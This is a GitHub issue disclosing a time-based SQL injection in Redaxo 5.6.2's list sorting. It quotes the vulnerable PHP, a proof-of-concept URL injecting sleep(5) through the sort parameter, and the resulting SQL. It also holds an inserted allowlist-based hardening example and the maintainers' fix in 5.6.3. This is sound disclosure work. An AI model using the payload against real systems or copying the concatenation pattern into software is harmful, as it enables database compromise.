
Sql Injection in Redaxo 5.6.2 #2043

Closed
Balis0ng opened this issue Sep 26, 2018 · 6 comments
@Balis0ng

details

in redaxo/src/core/lib/list.php:716

    protected function prepareQuery($query)
    {
        $rowsPerPage = $this->pager->getRowsPerPage();
        $startRow = $this->pager->getCursor();

        // prepare query for fast rowcount calculation
        $query = preg_replace('/^\s*SELECT/i', 'SELECT SQL_CALC_FOUND_ROWS', $query, 1);
        $sortColumn = $this->getSortColumn();
        if ($sortColumn != '') {
            $sortType = $this->getSortType();

            if (stripos($query, ' ORDER BY ') === false) {
                $query .= ' ORDER BY `' . $sortColumn . '` ' . $sortType;
            } else {
                $query = preg_replace('/ORDER\sBY\s[^ ]*(\sasc|\sdesc)?/i', 'ORDER BY `' . $sortColumn . '` ' . $sortType, $query);
            }
        }
        echo $query;
        #exit;
        if (stripos($query, ' LIMIT ') === false) {
            $query .= ' LIMIT ' . $startRow . ',' . $rowsPerPage;
        }
        return $query;
    }

This calls the getSortColumn function. View the function
in redaxo/src/core/lib/list.php:768

    public function getSortColumn($default = null)
    {
        if (rex_request('list', 'string') == $this->getName()) {
            return rex_request('sort', 'string', $default);
        }
        return $default;
    }

When the if condition is true, the function returns the value of the sort parameter obtained from the HTTP request.
Go back to the prepareQuery function above.

        if ($sortColumn != '') {
            $sortType = $this->getSortType();

            if (stripos($query, ' ORDER BY ') === false) {
                $query .= ' ORDER BY `' . $sortColumn . '` ' . $sortType;
            } else {
                $query = preg_replace('/ORDER\sBY\s[^ ]*(\sasc|\sdesc)?/i', 'ORDER BY `' . $sortColumn . '` ' . $sortType, $query);
            }
        }

When the value of $sortColumn is not empty, $sortColumn is spliced directly into the SQL statement, causing SQL injection.

Since this file (list.php) is used by many functions in this system, there are a lot of SQL injections.

POC

Here I use mysql's time-based injection.
First visit http://localhost/redaxo/index.php?page=users/users
Click sort as shown:

At this point the URL becomes http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login&sorttype=asc&list=6c9fee27
Change the URL as follows:
http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login`,sleep(5),`login&sorttype=asc&list=6c9fee27

Then visit the URL and you will see a response delay of 15s

The complete SQL statement executed is

    SELECT SQL_CALC_FOUND_ROWS
        id,
        IF(name <> "", name, login) as name,
        login,
        admin,
        IF(admin, "Admin", IFNULL((SELECT GROUP_CONCAT(name ORDER BY `login`,sleep(5),`id` asc SEPARATOR ",") FROM rex_user_role r WHERE FIND_IN_SET(r.id, u.role)), "_no_role")) as role,
        status,
        UNIX_TIMESTAMP(lastlogin) as lastlogin
    FROM rex_user u
    ORDER BY `login`,sleep(5),`id` asc
    LIMIT 0,30

Credit: ADLab of VenusTech
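The root cause above is that a request-controlled string (`sort`) is concatenated into an identifier position of the query, where prepared-statement placeholders cannot help. The following is an added example of one way to close that gap; it is not Redaxo's code and not the fix that shipped in 5.6.3. The class name `SafeSortQueryBuilder`, the allowlist of column names, and the sample queries are assumptions made for the illustration: the caller is assumed to know which columns the list may legitimately sort by, and anything else from the request is ignored rather than spliced in.

```php
<?php
// Added example, not part of Redaxo. Hardened counterpart of the
// prepareQuery()/getSortColumn() pattern shown in the report.
// Assumption: the set of sortable columns is known when the list is built.

final class SafeSortQueryBuilder
{
    /** @var string[] column names this list is allowed to sort by (allowlist) */
    private array $allowedColumns;

    /** @param string[] $allowedColumns */
    public function __construct(array $allowedColumns)
    {
        $this->allowedColumns = $allowedColumns;
    }

    /**
     * Return the requested column only if it is on the allowlist; null otherwise.
     * Strict comparison means a payload such as 'login`,sleep(5),`login'
     * never matches, regardless of how it is quoted later.
     */
    public function validateSortColumn(?string $requested): ?string
    {
        if ($requested === null || $requested === '') {
            return null;
        }
        return in_array($requested, $this->allowedColumns, true) ? $requested : null;
    }

    /** Reduce the direction to one of two fixed keywords; never echo the input back. */
    public function validateSortType(?string $requested): string
    {
        return strtolower((string) $requested) === 'desc' ? 'DESC' : 'ASC';
    }

    /**
     * Backtick-quote an identifier, doubling embedded backticks (MySQL rule).
     * Defence in depth only: the allowlist above is what actually stops injection.
     */
    public static function quoteIdentifier(string $name): string
    {
        return '`' . str_replace('`', '``', $name) . '`';
    }

    /**
     * Append ORDER BY using validated values. Unknown columns are dropped
     * silently; the original prepareQuery() would have concatenated them.
     */
    public function appendOrderBy(string $query, ?string $sort, ?string $sortType): string
    {
        $column = $this->validateSortColumn($sort);
        if ($column === null) {
            return $query;
        }
        return $query . ' ORDER BY ' . self::quoteIdentifier($column)
             . ' ' . $this->validateSortType($sortType);
    }
}

// Constructed demo inputs; the second request mirrors the payload shape reported above.
$builder = new SafeSortQueryBuilder(['id', 'name', 'login', 'status']);
$base    = 'SELECT id, login FROM rex_user u';

echo $builder->appendOrderBy($base, 'login', 'asc'), PHP_EOL;
echo $builder->appendOrderBy($base, 'login`,sleep(5),`login', 'asc'), PHP_EOL;
```

With these inputs the first call yields the base query with `ORDER BY \`login\` ASC` appended, while the second returns the base query unchanged because the requested column is not on the allowlist. The same allowlist check should be applied before the `preg_replace` branch that rewrites an existing ORDER BY clause, since that branch concatenates `$sortColumn` in exactly the same way.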

@staabm staabm self-assigned this Sep 26, 2018
@staabm
Member

staabm commented Sep 26, 2018

Thx for the report. Will investigate.

Since you already posted other security related bug reports: would you mind reporting those issues to the redaxo core team? We can/will give you the credit after we fixed it in a release.

Thanks for your report!

@Balis0ng
Author

Balis0ng commented Sep 26, 2018

@staabm Of course not. But I don't know how to report these issues to the core team.

@staabm
Member

staabm commented Sep 26, 2018

For now, please report those errors to info@redaxo.de

We are aware that we need a more secure channel, but we don't have such a channel right now.
(Docs on how/where to report a security issue are only available in German right now.. we have to fix that)

@Balis0ng
Author

@staabm OK, I will send the follow-up security question to this email, I hope that you will fix it and give me credit as soon as possible.

@staabm
Member

staabm commented Sep 26, 2018

Just tagged 5.6.3 with a fix for the reported problem and credits for you in the changelog
https://github.com/redaxo/redaxo/releases/tag/5.6.3

We will do a release announcement on redaxo.org , again giving you credits.

Thx for the report

@Balis0ng
Author

@staabm OK. Thank you.

staabm added a commit to redaxo/redaxo4 that referenced this issue Dec 19, 2018